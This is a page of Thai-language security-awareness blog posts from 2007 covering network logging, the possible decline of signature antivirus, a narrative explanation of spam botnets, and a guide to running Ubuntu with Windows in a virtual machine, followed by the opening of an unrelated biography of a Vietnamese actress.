ซึ่งทั้งหมดนี้จะเป็นการเก็บบันทึกข้อมูลจราจร ที่เกิดขึ้นจากการใช้งานคอมพิวเตอร์ ที่เรียกว่า “์Network Recorder” ซึ่งแน่นอนครับ ทั้งหมดนี้เวลาเป็นสิ่งสำคัญ Time Server จึงต้องเป็นเวลาที่เที่ยงตรงด้วยไม่เช่นนั้น เราจะทำการย้อนหลังเวลาที่บันทึกเหตุการณ์ โดยนั่ง Time Machine ทางเทคโนโลยี เพื่อสืบหาข้อมูลต่อไปไม่ได้
เมื่อทราบถึงการเก็บบันทึกข้อมูลจราจรแล้ว ต่อไป เราจะมาทราบถึงการย้อนเวลาเพื่อสืบค้นหา เหตุของปัจจั้ย สาเหตุต่างๆ ที่ค้นพบได้ ผ่านระบบเครือข่าย โดยการทำ Network Time Machine กันต่อไป
SRAN ที่คิดไว้ สามารถสร้างเป็น Network Time Machine จะบรรจบกันในโลกไซเบอร์ บนเวลาปัจจุบันที่เป็นจริงได้ ในตอนหน้าจะยกตัวอย่างให้เห็นภาพ
โปรดติดต่อตอนต่อไป ข้อแม้ว่่า จะมีตอนต่อไป ตามอารมณ์ผู้เขียน : )
นนทวรรธนะ สาระมาน
Nontawattana Saraman
27/10/50
CAT Telecom จัดงานเปิดตัวบริการใหม่ล่าสุด ‘Cyfence’ บริการการรักษาความปลอดภัยระบบเครือข่ายเทคโนโลยีสารสนเทศ ในวันอังคารที่ 24 ตุลาคม 2549 เวลา 10.00 น. ณ ห้องบางกอก คอนเวนชั่นเซ็นเตอร์ ชั้น 5 เซ็นทรัล พลาซ่า ลาดพร้าว
หลายคนมักสนใจกับคำว่า “จุดจบ” เพราะจุดจบอาจจะเหลือเพียงประวัติศาสตร์ สำหรับผมแล้วที่ตั้งหัวข้อนี้ว่า จุดจบซอฟต์แวร์แอนตี้ไวรัส เป็นเพียงมุมมองและความคิดของผมเองนะครับ ท่านผู้อ่านลองคิด วิเคราะห์ตามว่าเห็นด้วยอย่างที่ผมคิดหรือเปล่า
ในอดีตที่ผ่าน เรามีอดีตกับ เทคโนโลยีสำหรับงานสื่อสาร ที่ถือได้ว่าเลิกใช้งานไปแล้ว หรือที่เรียกได้ว่าเกิดจุดจบของระบบไปเสียแล้ว หากลองลำดับดูหน่อยดีไหมครับว่ามีอะไรบ้าง เท่าที่ผมจะคิดได้ก็มีดังนี้
– ระบบโทรเลข กลายเป็นประวัติศาสตร์ไปเสียแล้วปัจจุบันก็ไม่มีใครใช้บริการโทรเลขแล้ว
– ระบบเพจเจอร์ ปัจจุบันก็เหลือน้อยจนเรียกได้ว่า ไม่มีผู้ใช้งานระบบนี้ไปแล้วเช่นกัน
– เทคโนโลยีบรรจุข้อมูล เช่นเดียวกันกับเรื่องของตลับเทปเพลง ที่สมัยนี้ฟังจาก MP3 ที่จุเพลงได้จำนวนมากแทน รวมถึงเทปวีดิโอ และ Disked ที่ใส่ข้อมูลในเครื่องคอมพิวเตอร์ ก็แทบจะไม่มีแล้ว Notebook สมัยใหม่ก็ไม่มีช่องเสียบแผ่น Disked ไปเสียแล้ว ยุคสมัยทำให้เปลี่ยนไปเป็นพัฒนากลายเป็น แผ่น CD ตามมาด้วยการจุข้อมูลที่เรียกว่า Personal External Hard disk ที่จุข้อมูลได้เยอะกว่า และสะดวกในการใช้งานแทนที่ของเดิมที่เคยใช้กัน
และอีกบางส่วนที่กำลังจะเกิดจุดจบได้ในประเทศไทย เราอีกระบบคือ ตู้โทรศัพท์หยอดเหรียฐ สมัยนี้เกือบทุกคนก็ติดต่อผ่านมือถือ คงเหลือไว้เพียงตู้โทรศัพท์สำหรับเหตุฉุกเฉินเมื่อแบตเตอรี่มือถือหมด หรือเหตุใดๆ ที่ต้องการซ่อนเบอร์เพื่อติดต่อหาผู้อื่น
ระบบการส่งข้อมูลแบบ Token Ring ที่ในปัจจุบันระบบนี้ไม่สะดวกกับการใช้งานนัก และการรับส่งข้อมูลก็อยู่ในอัตตราที่ล้าสมัยไม่รวดเร็วเหมือนเทคโนโลยีใหม่ , ระบบการทำงานบนเครื่อง MainFrame เนื่องจากราคาสูง และการใช้งานเฉพาะทาง ที่ปัจจุบันหาระบบมาใช้ทดแทนกันได้ โดยราคาประหยัดลง เทคโนโลยีนี้จึงค่อยหายไปในโลกปัจจุบันไป , ระบบการส่งข้อมูลที่ใช้และระบบการทำงานที่ยังต้องยึดติด Application software จากระบบปฏิบัติการโบราณ ได้แก่ ระบบ DOS , Windows 3.11 , Windows 95 เป็นต้น
โลกสมัยปัจจุบัน ดังนี้
แนวคิดที่อยู่ได้คือ แนวคิดแบบ Open Source
เว็บไซด์ www สมัยใหม่เกิดจากแนวคิดแบบ Open Source จึงทำให้เกิด community (ชุมชน online) และทำให้เกิด Web 2.0 ตามมา เป็นไปตามเหตุปัจจัย หรือ อิทัปปัจจยตา นั้นเอง
เช่นเดียว google แนวคิดแบบทฤษฎึเกมส์ (Game Theory) ทำให้เกิด แนวคิด google Summer of Code เป็นต้น
ซอฟต์แวร์ แอนตี้ไวรัส ถึงเวลาแล้วหรือ ที่จะเกิดจุดจบ ? ยังหลอกครับแค่ผมมองอนาคตไปไกลอีกแล้ว แค่มีความเป็นไปได้เท่านั้นเอง ว่าอาจจะถึงจุดจบ ด้วยเหตุผล 2 ประการ ดังนี้
ประการที่ 1 ซอฟต์แวร์แอนตี้ไวรัส ถือได้ว่าเป็น Blacklisting Technology นั้นหมายถึงต้องอาศัยฐานข้อมูล (Data Base / Signature) เพื่อให้ทราบถึง ชื่อ ประเภทและข้อมูลของไวรัส ถ้าเป็นเช่นนั้น ผู้ใช้จำเป็นต้อง Update ฐานข้อมูลอย่างสม่ำเสมอ ถึงจะปลอดภัยกับปัญหาไวรัสและภัยคุกคามตัวอื่นๆ ไม่ว่าเป็น Worm , Trojan / SPyware/ Adware / Spam ไปได้ โดยเฉพาะสมัยนี้ถือได้ว่ามีชนิดไวรัสใหม่ๆ เกิดขึ้นไม่เว้นแต่ละวัน แต่ละชั่วโมง และต่อไปอาจเป็นแต่ละนาที หรือแต่ละวินาที ก็อาจเป็นไปได้
ฉะนั้นเมื่อกาลเวลาผ่านไป ผู้ใช้อินเตอร์เน็ตมีจำนนวนมากขึ้น มีผู้ไม่หวังดีมากขึ้นตามจำนวนการใช้งาน เกิดมีผู้เขียนไวรัสมากขึ้นตามไปด้วย ด้วยเหตุปัจจัยเหล่านี้เอง ทำให้ผู้ที่ต้องใช้ซอฟต์แวร์แอนตี้ไวรัส ต้องหมั่นตรวจสอบตัวเองเพื่อไม่ให้ตกเป็นเหยื่อได้ แน่นอนย่อมพลาดและเสียทีให้กับไวรัส ที่ไม่พึ่งประสงค์ได้
จากข้อมูล shadowserver พบว่ามีไวรัสเกิดใหม่ทุกๆวันและมีปริมาณที่สูงขึ้น และมีไวรัสที่แอนตี้ไวรัสเจ้าอื่นๆที่ขายและให้บริการอยู่ไม่สามารถตรวจตรงกันได้เช่นกัน
ทำให้เดาได้ว่า เครื่องคอมพิวเตอร์ส่วนบุคคล หากใช้ระบบปฏิบัติ Windows อาจจะจำเป็นต้องลงโปรแกรมแอนตี้ไวรัสมากกว่า 1 ชนิดในเครื่องเดียวกัน เพื่อป้องกันการตรวจจับไม่เจอของไวรัสคอมพิวเตอร์อีกด้วย จึงเป็นเรื่องที่ยาก ที่จะไม่ทำให้เครื่องใช้งานส่วนบุคคล ทำงานช้าเพราะมั่วแต่ Update ฐานข้อมูล และการตรวจจับแบบ Real Time ที่ค่อยป้องกันให้เครื่องปลอดภัยในการท่องอินเตอร์เน็ต แต่ละวันได้ ไม่ว่าเป็นการเปิดเว็บ สมัยใหม่ด้วยแล้ว เปิดเว็บเพียงหน้าเดียวแต่ติดต่อกับมายังเครื่องเราหลาย session เนื่องจากเป็น Dynamic Web ความเสี่ยงตามมา การใช้อีเมล์ ความเสี่ยงที่พบไม่ว่าเป็น Spam และ phishing รวมถึง Scam Web อาจทำให้เราตกเป็นเหยื่อได้ ถึงแม้ใช้โปรแกรมแอนตี้ไวรัสก็ตาม
เหตุของปัจจัยที่ทำให้เครื่องคอมพิวเตอร์ส่วนบุคคลช้า เนื่องจากโปรแกรมแอนตี้ไวรัส ที่ใช้ Blacklist Technology คือ
1. เครื่องคอมพิวเตอร์หน่วง เน่ืองจากฐานข้อมูล และกลไกลในการตรวจจับแบบ Real Time
2. เคร่ืองคอมพิวเตอร์หน่วง เนื่องจาก ซอฟต์แวร์แอนตี้ไวรัสไปเกาะการทำงานระบบ Operating System เพื่อใช้ในการ Update ข้อมูล และตรวจค่า License กับบริษัทผู้ผลิต
3. ลักษณะการใช้งานอินเตอร์เน็ตในยุคปัจจุบัน ที่ต้องท่องอินเตอร์เน็ตผ่าน (www) แล้วมีลักษณะการเขียน เว็บที่เป็น Dynamic โดยอาศัยเทคโนโลยี Ajax ที่การประมวลผลจะมาหนักที่เครื่องลูกข่าย (Client) จึงเป็นผลเครื่องคอมพิวเตอร์ช้า และโปรแกรมแอนตี้ไวรัสจะทำงานหนักขึ้นอีกด้วย
4. โปรแกรมแอนตี้ไวรัสในยุคปัจจุบัน มักรวมความสามารถในการตรวจจับได้ในหลายส่วน เรียกว่า เป็น Internet Security ที่ประกอบด้วย การป้องกันไวรัส worm ป้องกัน Spam , phishing และ scam web เป็นต้น จึงทำให้ต้องการฐานข้อมูลที่มากพอ ที่จะเรียนรู้ภัยคุกคามสมัยใหม่ ได้ทัน
5. ภัยคุกคามที่เรียกว่า 0 day เกิดจากช่องโหว่ของ Application Software มีมากขึ้นตามจำนวนซอฟต์แวร์ใหม่ ที่เกิดขึ้น จึงทำให้ต้องมีการแข่งขันกันสำหรับผู้ผลิต ถึงฐานข้อมูลโปรแกรมแอนตี้ไวรัส ต้องตามให้ทันกับภัยคุกคามสมัยใหม่
โปรดติดต่อตอนต่อไป
นนทวรรธนะ สาระมาน
Nontawattana Saraman
28/08/50
.. เพราะสิ่งนี้มีสิ่งนี้จึงมี เพราะสิ่งนี้ไม่มีสิ่งนี้จึงไม่มี ..
“สรรพสิ่งล้วนเปลี่ยนแปลงไปเพราะกระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง กระแสของเหตุปัจจัยหรือความเป็นเช่นนั้นเ่อง (ตถตา = ความเป็นเช่นนั้นเอง) คือความจริง การอยากให้มีหรืออยากให้ไม่มีตามใจเราไม่ใช่ความจริง ..”
ความเป็นจริง ทางโลกความมั่นคง ข้อมูลสารสนเทศ ผมตั้งศัพท์ไว้ว่า Information Security Ontology นั้นก็คือ อิปัปปัจจยตา ในทางโลกของข้อมูลสารสนเทศ นั่นเอง
บทความใน blog นี้ ผมต้องการแสดงออกถึงความเป็นจริง อันเป็นเหตุของปัจจัยที่สร้างปัญหาทางการใช้เทคโนโลยีในภาษาที่เข้าใจง่าย สร้างเสริมความตระหนักในการใช้ข้อมูลสารสนเทศ และจริยธรรมอันดีให้กับผู้ใช้อินเตอร์เน็ตในประเทศไทย
บทหนึ่ง Internet Suffering
เรามานั่งนึกๆ ถึงเหตุปัจจัยจาก Spam (อีเมล์ขยะที่ไม่พึ่งต้องการ) ที่เราได้รับในแต่ละวันจำนวนมาก เหตุปัจจัยนี้เกิดจากสิ่งหนึ่ง มีผลกับสิ่งหนึ่งทำให้เกิดสิ่งนี้ ที่เรียกว่า Spam เป็นเหตุปัจจัย เกิดความทุกข์ รำคาญ และหงุดหงิดกับสิ่งที่ไม่ต้องการ เหตุปัจจัยดั่งกล่าวเชื่อมโยงกันเป็นปัญหาลูกโซ่บนระบบอินเตอร์เน็ตจนทำให้เกิดทุกข์ (Internet Suffering) นอกจาก Spam แล้วก็ยังมีอีกหลายๆ เหตุปัจจัยทำให้เกิดปัญหาบนโลกอินเตอร์เน็ตในการใช้งานคอมพิวเตอร์ในแต่ละวัน ไม่ว่าเป็น Hacker ,Virus/worm , Spyware , Trojan , Phishing อื่นๆ ที่พบได้
สาเหตุของปัญหา เกิดขึ้นจาก คน และไม่่ใช่คน บนเจตนา และไม่เจตนา โดยที่เหยื่อคือ คนที่รู้เท่าไม่ถึงการณ์
อันที่เป็นคน คือ ผู้ที่มีเจตนาไม่หวังดี หรือเรียกว่า (Hacker/Attacker)
อันที่ไม่ใช่คน คือ ซอฟต์แวร์ที่ผลิตขึ้นบนเจตนาที่ไม่หวังดี เรียกว่า malware ซึ่งอาศัยเครื่องคอมพิวเตอร์ของผู้อื่น เป็นผู้กระทำการใดการหนึ่งที่สร้างความเสียหายให้เกิดขึ้น โดยเครื่องที่ถูก Malware อาศัยอยู่ เรียกว่า zombie มักกระทำการโดยรับคำสั่งจากผู้ไม่หวังดี (hacker/attacker) โดยทำการใดการหนึ่งจากความไม่เจตนา เพื่อทำสิ่งใดสิ่งหนึ่งที่เป็นเหตุของปัจจัยทำให้เกิด Internet Suffering มักนิยมอาศัยบนเครื่องผู้อื่นที่ขาดความรู้เท่าไม่ถึงการณ์ เมื่อ zombie หลายๆเครื่องรวมกัน เรียกว่า botnet
และ botnet คือพาหนะที่ทำให้เกิด Internet Suffering หลากหลายปัญหาเกิดขึ้นจากสิ่งนี้
ตามหลักอิทัปปัจจยตา (ความจริงทางธรรมชาติ) แล้วเมื่อเราลำดับเหตุการณ์ของปัญหา Spam โฆษณายาลดความอ้วนยี่ห้อหนึ่งที่เข้าสู่ Mail box ของเราจะพบว่า
IP ที่ส่ง Spam โฆษณาตัวนี้ มาได้ 2 ทาง ประกอบด้วย
1. ทางตรง จากผู้ไม่ประสงค์ดี และส่ง Mail มาโดยตรงถึงเรา เมื่อเปิดอ่าน mail พบว่าเป็นสิ่งที่เราไม่ต้องการรับรู้ กลายเป็น Spam
2. ทางอ้อม จากผู้ไม่รู้ ที่เป็นเหยื่อ (zombie) ส่งมาถึงเรา
กระบวนการผู้ไม่รู้ หรือที่เป็นเหยื่อ (zombie) มักเกิดขึ้นได้ จากการใช้อินเตอร์เน็ต
ยกตัวอย่าง ผู้ไม่รู้ นามสมมุติ A ทำการเข้าอินเตอร์เน็ต และเปิดบราวเซอร์ เพื่อท่องเว็บ (www) แห่งหนึ่ง พบ โปรแกรมเสริม ที่ช่วยให้เล่นอินเตอร์เน็ต ได้ไว ขึ้น เพราะความอยากรู้ หรือ โลภ จึงทำการ Download เพื่อทำการลงโปรแกรมดังกล่าว ทั้งทีโปรแกรมนี้มีการฝั่ง Malware (ซอฟต์แวร์ที่มีเจตนาไม่พึ่งประสงค์จาก Hacker / Attacker) เมื่อทำการติดตั้งโปรแกรมสำเร็จแล้ว เครื่องคอมพิวเตอร์นาย A กับไม่ได้ท่องอินเตอร์เน็ตได้เร็วขึ้นแต่อย่างใด กับกลายเป็น Zombie ให้กับนาย B ผู้เขียนซอฟต์แวร์นี้ขึ้น
ทั้งนี้แล้วนาย A ก็ยังไม่รู้ตัว และทุกครั้ง ที่นาย A ท่องอินเตอร์เน็ต เครื่องนาย A จะทำการส่ง e-mail ไปยังเพื่อนๆ ในรายชื่อ mail บนเครื่องตนเอง เป็น โฆษณายาลดความอ้วนอยู่เสมอ ที่แย่กว่านั้น Malware ที่นาย B เขียนขึ้น ยังบังคับให้เครื่องคอมพิวเตอร์นาย A ส่ง Password ทั้งหมดในเครื่องมายังที่ตน เหตุการณ์ทั้งหมดที่เกิดขึ้นนาย A ไม่ได้มีเจตนาในการส่ง e-mail โฆษณา เลย เป็นเพราะความรู้เท่าไม่ถึงการณ์ที่ลงโปรแกรมเพิ่มความเร็วเท่านั้นเอง
นี้เป็นตัวอย่างหนึ่งของเหตุปัจจัยการทำให้เกิด Internet Suffering จำนวน Zombie หรือเครื่องที่ต้องเป็นเหยื่อ ที่ยังไม่รู้ตัวมีจำนวนมาก ตามขนาดการเจริญเติบโตอินเตอร์เน็ต จะมีผู้ใช้หน้าใหม่ และ ผู้ใช้ที่ไม่ระวังตกเป็นเหยื่อ ปริมาณของพฤติกรรมนี้เองทำให้เกิด Internet Suffering
แนวทางการป้องกันคือ เริ่มจากตนเองก่อน เครื่องคอมพิวเตอร์ของเราต้องปลอดภัยเสียก่อน เมื่อท่องอินเตอร์เน็ต สร้างเสริมพฤติกรรมใหม่ ให้มีสติ และพึ่งระวังการใช้งานในการท่องอินเตอร์เน็ต โดยพึ่งสังเกตเสมอว่า ทุกย่างก้าวของเราล้วนมีความเสี่ยง
ส่วนผู้ที่มีความรู้แล้ว ควรมีหิริโอตัปปะ คือความละอายต่่อบาป มีจริยธรรมในการใช้งานอินเตอร์เน็ต (ethical hacker)
“สรรพสิ่งทั้งหลายล้วนเป็นอนิจจัง คือเปลี่ยนแปลงไม่หยุดนิ่ง นั่นคือความจริง แต่เรามักติดอยู่ในความไม่จริง คือคิดว่าสิ่งต่างๆ เป็นนิจจัง”
นนทวรรธนะ สาระมาน
Nontawattana Saraman
23/08/50
อ้างอิงบางประโยคจาก หนังสือ ความจริง ความงาม ความดี โดย ศ.นพ. ประเวศ วะสี
บทความ ลมหายใจระบบเครือข่าย 3 in 3 out เขียนเมื่อ เดือนพฤษภาคม 2550
บทความ กองทัพ botnet คืออะไร เขียนเมื่อ เดือนกุมภาพันธ์ 2550
บทความ เหตุของปัญหาระบบเครือข่ายคอมพิวเตอร์ เขียนเมื่อ เดือนพฤศจิกายน 2549
งานบรรยาย http://nontawattalk.blogspot.com/2007/07/by-your-side.html
สำหรับคอมพิวเตอร์ส่วนบุคคล แล้วการใช้งานจำเป็นต้องเหมาะสม และมีความถนัดในการทำกิจกรรมต่างๆ ไม่ว่าจะท่องโลกอินเตอร์เน็ต การจัดพิมพ์เอกสาร การดูหนังฟังเพลง หรือตลอดจนการเล่นเกมส์
ผมได้ทดลองกับตัวเอง โดยการหาคุณสมบัติคอมพิวเตอร์โน็ตบุ๊ต ที่มีคุณสมบัติขั้นต่ำดังนี้
1. CPU ความเร็วไม่น้อยกว่า 1.6 Ghz
2. RAM ความเร็วไม่ต่ำกว่า 1 Ghz
3. Harddisk ความจุไม่ต่ำกว่า 80 GB
ที่ต้องเลือกคุณสมบัติเครื่องที่สูงเนื่องจากต้องการสร้างระบบปฏิบัติการหลัก (Core Operating System)เป็น Linux และต้องสร้างระบบปฏิบัติการเสริมเป็น Windows เพื่อสำหรับใช้ในซอฟต์แวร์บางตัวที่ระบบปฏิบัติการ Linux ยังมีความสามารถไม่ถึง ได้แก่ซอฟต์แวร์ในการแผนผังระบบเครือข่าย โดยปกติเราใช้ Microsoft Visio หรือโปรแกรมเกี่ยวกับการตกแต่งรูป ที่ Windows สามารถเลือกใช้ได้หลายตัวไม่ว่าเป็น Photoshop หรือ illustrator ใน Linux มีการใช้ซอฟต์แวร์ตัวนี้ได้เกือบจะดีคือ Gimp แต่ก็ยังไม่เพียงพอสำหรับนักออกแบบที่เคยติดกับการใช้งานบนระบบปฏิบัติการ Windows ได้ เป็นต้น
Step by Step การทำให้เครื่องคอมพิวเตอร์ของเราปลอดภัย
1. แบ่งการเก็บเนื้อที่ฮาร์ดดิส อย่างน้อย 2 Patition คือมีให้เก็บเฉพาะข้อมูล 1 Patition และมีให้ใช้สำหรับระบบปฏิบัติการอีก 1 patition ไม่ควรเก็บข้อมูลใน Patition เดียวเพราะหากระบบปฏิบัติการมีปัญหาข้อมูลอาจมีความเสียหายได้ ปัญหาหลักๆ ของระบบปฏิบัติการมีปัญหานั้นได้แก่ การติดไวรัส นั้นเอง
โดยสมมุติ หากเรามีเนื้อที่ฮาร์ดิสอยู่ 80 GB ผมทำการแบ่งให้กับการเก็บข้อมูล 40 Gb และ ระบบปฏิบัติการอีก 40 Gb
2. สำหรับระบบปฏิบัติการหลัก ผมเลือกลง Linux ที่ใช้ Distro Debian นั้นคือ Ubuntu Linux นั้นเอง สำหรับใครชอบ X Windows แบบใด ไม่ว่าเป็น Gnome หรือ KDE หรืออื่นๆ ก็สามารถเลือกใช้ได้ตามต้องการ สำหรับผมเลือก Gnome เนื่องจากความถนัดส่วนตัวครับ
ที่เลือก Debian Ubuntu เนื่องจากมีระบบ Update Software และ Update Security Patch แบบอัตโนมัติ ผ่านโปรแกรมที่ชื่อว่า Update Manager และการกำหนดโปรแกรมที่ลงผ่าน Synaptic Package Manager ทำให้เรามีซอฟต์แวร์ที่ทันสมัยอยู่เสมอ (ปลอดภัยและทันสมัย) อีกทั้งไม่ต้องเสียค่า License ในการ Update อีกด้วยครับ
จากเดิมที่แบ่งระบบปฏิบัติการไป 40 Gb ก็อย่างลืม ลงเพื่อใช้ Swap space ไปสัก 10% การใช้งานเนื้อที่ฮาร์ดิสและการประมวลผลด้วยนะครับ เพื่อว่าหาก RAM เครื่องหมดจะมาใช้ต่อที่ตัวนี้กัน
ส่วนการตั้ง Path ตามสำควรและความถนัดครับ
3. เมื่อทำการลงระบบปฏิบัติการหลักเสร็จแล้ว เราก็จะทำการลงซอฟต์แวร์ ที่มีความจำเป็นสำหรับการใช้งาน
ผมแยกกันลืมสำหรับตัวเองด้วย ดังนี้ครับ
3.1 Accessories เพิ่มโปรแกรมที่ชื่อ Wine เป็นโปรแกรมที่สามารถรันไฟล์ที่ใช้กับระบบปฏิบัติการ Windows ได้ ที่ผมเลือก wine เพราะผมจำเป็นต้องใช้ SSH Client อยู่เพื่อทำการ Remote และ FTP ผ่าน SSH Protocol รัน Wine เพื่อใช้ SSH ไม่ได้รัน Wine เพื่อเล่นเกมส์ที่เหมาะกับ Windows นะหากคิดอย่างนั้นต้องมี RAM เยอะหน่อยครับ โชคดีหน่อยผมไม่ติดเกมส์ และ Chat ส่วน Linux หากชอบ Chat เราจะเลือกใช้ Gaim ได้ครับตัวนี้รองรับ chat ได้หลายตัวทีเดียว
3.2 Graphics ผมเพิ่มโปรแกรม
– Dia Diagram editor ไว้สำหรับทำงานการเขียนแผนผังระบบเครือข่าย ตัวนี้ยังสู้ Windows ไม่ได้ แต่ก็พอใช้งานได้ครับ
– Ksnapshot เพื่อใช้ในการ Capture ภาพ และตัดต่อภาพ เพื่อ ทำรายงาน/ทำเว็บ
– OpenOffice Drawing ไว้วาดแผนผังต่างๆ
3.3 Internet ในตัว ubuntu มีบราวเซอร์มาให้คือ Firefox เพียงอันเดียวก็เกินพอแล้วครับ เพราะ Firefox มี add on มากมายให้เลือกใช้ แต่สำหรับผมแล้วเพิ่มอีกโปรแกรมคือ Opera เนื่องจากบางเว็บไซด์ในไทยยังเขียนเพื่อให้อ่านบราวเซอร์ที่ Windows ใช้คือ IE อยู่จึงไม่สะดวกนักหากใช้เพียง Firefox อาจจะอ่านเว็บเหล่านั้นได้ยาก Opera จึงเป็นอีกทางเลือกหนึ่งสำหรับอ่านเว็บภาษาไทยที่ยังขาดการตัดคำและจัดหน้าเพจไม่ได้รองรับกับ Firefox
– Mail Client ผมเลือก Thuderbird Mail ครับ ตัวนี้สะดวกดีและทำงานได้ดีไม่แพ้ outlook ครับ
– Wireshark งานของผมมักเกี่ยวข้องกับระบบเครือข่าย ดังนั้นโปรแกรมที่ไว้วิเคราะห์ระบบเครือข่ายที่ดี คือ Ethereal ซึ่งปัจจุบันเปลี่ยนชื่อใหม่ว่า Wireshark ครับ ตัวนี้เหมาะกับระบบ Linux ใช้งานได้ดีมากครับ
3.4 Office ไม่ต้องสงสัยเราจำเป็นต้องใช้ Open office ถึงแม้จะสู้กับทาง Microsoft office ไม่ได้ก็ตาม ก็พอใช้ได้ครับ ณ ปัจจุบันทำงานได้ดีกว่าเก่าเยอะครับ ก็ยังมีปัญหาเรื่อง Font อยู่บ้างแต่เล็กน้อยเมื่อเทียบกับเมื่อก่อน ถือว่าพอใช้งานได้ครับ
3.5 Sound & video เพื่อให้อ่านเว็บและโปรแกรมที่ต้องดูหนังได้อย่างสมบูรณ์ยิ่งขึ้น ผมลงพวก Codex , Codine เพิ่มเติมครับ และใช้โปรแกรม Mplayer เกือบทั้งหมด ทั้งดูหนังและฟังเพลง ส่วนการไลท์แผ่นโปรแกรมแล้วเพิ่มเติมจากของเดิมที่ลงให้ โดยการลงโปรแกรมชื่อ K3B ช่วยได้เยอะครับ เหมือน Nero burnบน Windows ใช้งานง่าย ไม่ติดปัญหาครับ
3.6 System ส่วนลงเพิ่มเติมจากของเดิมดังนี้
– Windows Manager เลือกใช้ Beryl ช่วยให้ Desktop เราดูหรูขึ้นครับ เป็น 3D
– file system เลือกใช้ Ntfs3-3g เพื่อไว้เม้าหาฮาร์ดดิสที่เป็นระบบ NTFS ครับ นี้เป็นปัญหาหนึ่งที่ linux มีความยุ่งยากกว่าระบบ Windows อยู่
– Virtual machine ส่วนนี้ผมใช้ Open source ชื่อว่า Virtulbox หรือ Vmware player ก็ได้ครับ ทั้งคู่เป็น Open Source
4. ทำการลง Virual Machine เพื่อสร้างระบบปฏิบัติเสริมหลังลงระบบปฏิบัติการหลัก ในที่นี้เราใช้ Virtulbox เพื่อลงระบบปฏิบัติการ Windows XP ที่ต้องใช้ Windows บน Virual Machine เหตุผลคือ
ซอฟต์แวร์บางตัวบนระบบปฏิบัติการ Linux ยังใช้งานได้ไม่สมบูณ์ ว่าเป็นระบบตัดคำ ระบบสร้างกราฟิก รวมถึงการโปรแกรมวาดแผนผังระบบเครือข่าย เป็นต้น สำหรับผมแล้ว พบว่าการส่งข้อมูลเสียงผ่านอินเตอร์เน็ทระบบปฏิบัติการ Windows ทำได้ดีกว่า linux อยู่บ้างในบางเว็บไซด์ และดันเป็นเว็บไซด์ที่ผมต้องเข้าไปฟังเนื้อหาเป็นประจำ จึงต้องเลือกลง Virual Machine เป็น Windows
เมื่อทำการลงเสร็จ เราสามารถตัดหน้าจอโดยใช้เม้าเปลี่ยนเลือกเป็น Windows และ Linux ได้พร้อมกันโดยใช้ ความสามารถของ Beryl
นี้แหละครับเท่านี้เราก็หลีกเลี่ยงการติดไวรัสคอมพิวเตอร์ และพวก สปายแวร์ที่ติดตามโปรแกรมและพฤติกรรมการท่องอินเตอร์เน็ตเราได้มากพอสมควรเนื่องจาก ระบบปฏิบัติการหลักเราคือ Linux และ Windows อยู่ใน Virual Machine แล้วการติดไวรัสที่ทำร้ายต่อระบบปฏิบัติการ Windows ก็จะไม่แพร่กระจายไปสู่ระบบปฏิบัติการหลักที่เป็น Linux ยกเว้นบางกรณี ซึ่งถ้าเทียบตามความน่าจะเป็นแล้วน้อยมากที่เครื่องติดเป็น Zombie จากระบบปฏิบัติการ Linux ได้ยกเว้นจะโดน Hack เข้าสู่ระบบปฏิบัติการภายใน การติดจากการท่องอินเตอร์เน็ตนั้นน้อยกว่า Windows อยู่มาก และไม่ต้องกังวลต้องลงซอฟต์แวร์แอนตี้ไวรัส เพื่อทำให้เครื่องโหลดจากฐานข้อมูลไวรัสที่มีการ Update ตลอด ไม่ต้องกังวลเครื่องจะเป็น Backdoor อีกต่อไปเพราะระบบปฏิบัติการเราเป็น Open Source หากเล่นกันชำนาญเราปรับแต่งได้เองอีกมากมาย
หากต้องการกันไวรัสที่อาจเกิดขึ้นบนระบบปฏิบัติการ linux ก็มี Open source Anti virus ที่เป็นที่นิยมสูงคือ Clamav และหากต้องการใช้เป็นแบบ GUI บน linux ก้มีให้เลือกใช้เป็น klamav อีกด้วยครับ
ประโยชน์ที่ได้รับต่อไปคือการสร้างเสริมนิสัยให้ใช้ Open source และสร้างความคุ้นเคยกับระบบปฏิบัติการ Linux มากขึ้น จะได้ลดค่าใช้จ่ายในการใช้ซอฟต์แวร์ ที่มีลิขสิทธิอีกด้วยครับ
จงจำไว้ว่า ความปลอดภัยข้อมูล เริ่มจากตัวเองก่อน เริ่มจากเครื่องคอมพิวเตอร์ของเรา ต่อจากนั้นคือพฤติกรรมการใช้งานของเรา การใช้ข้อมูลผ่านเครือข่ายของเรา ออกสู่โลกภายนอก หากระบบปฏิบัติการบนเครื่องของเราแข็งแรงพอ และใช้ซอฟต์แวร์อย่างเหมาะสม และพอเพียง จะทำให้เรามีภูมิต้านทานได้ หากทุกคนมีความรู้ และมีความตระหนักในการใช้ข้อมูลสารสนเทศ เราจะสูญเสียเงินในการจัดซื้อจัดจ้้างระบบรักษาความปลอดภัยน้อยลง และปัญหาจุกจิกที่พบในชีวิตประจำวันเราก็จะน้อยลงไปด้วยเช่นกัน
นนทวรรธนะ สาระมาน
Nontawattana Saraman
18/08/50
บทความที่เกี่ยวข้อง http://nontawattalk.blogspot.com/2007/06/windows.html
ประวัติของ เถิ่ม ถุย หั่ง หรือ ถั่ม ถุย หั่ง ถ้าออกเสียงแบบสำเนียงใต้ของเวียดนาม (Thẩm Thúy Hằng )
เถิ่ม ถุย หั่ง Thẩm Thúy Hằng เป็นดาราเวียดนามที่มีชื่อเสียงมากคนหนึ่ง เป็นดาวจรัสแสงแห่งภาพยนตร์พานิชย์ของเวียดนามใต้ ตั้งแต่ช่วงปลาย ทศวรรษที่ 1950 ถึง ปลาย 1970 เธอเล่นภาพยนตร์มากมาย ซึ่งก็มีภาพยนตร์เวียดนามที่ร่วมหุ้นกับต่างชาติด้วย ชื่อเสียงของเธอจึงไม่ได้แค่โด่งดังในเวียดนาม แต่เป็นที่รู้จักในประเทศอื่น ๆ ในภูมิภาคด้วย
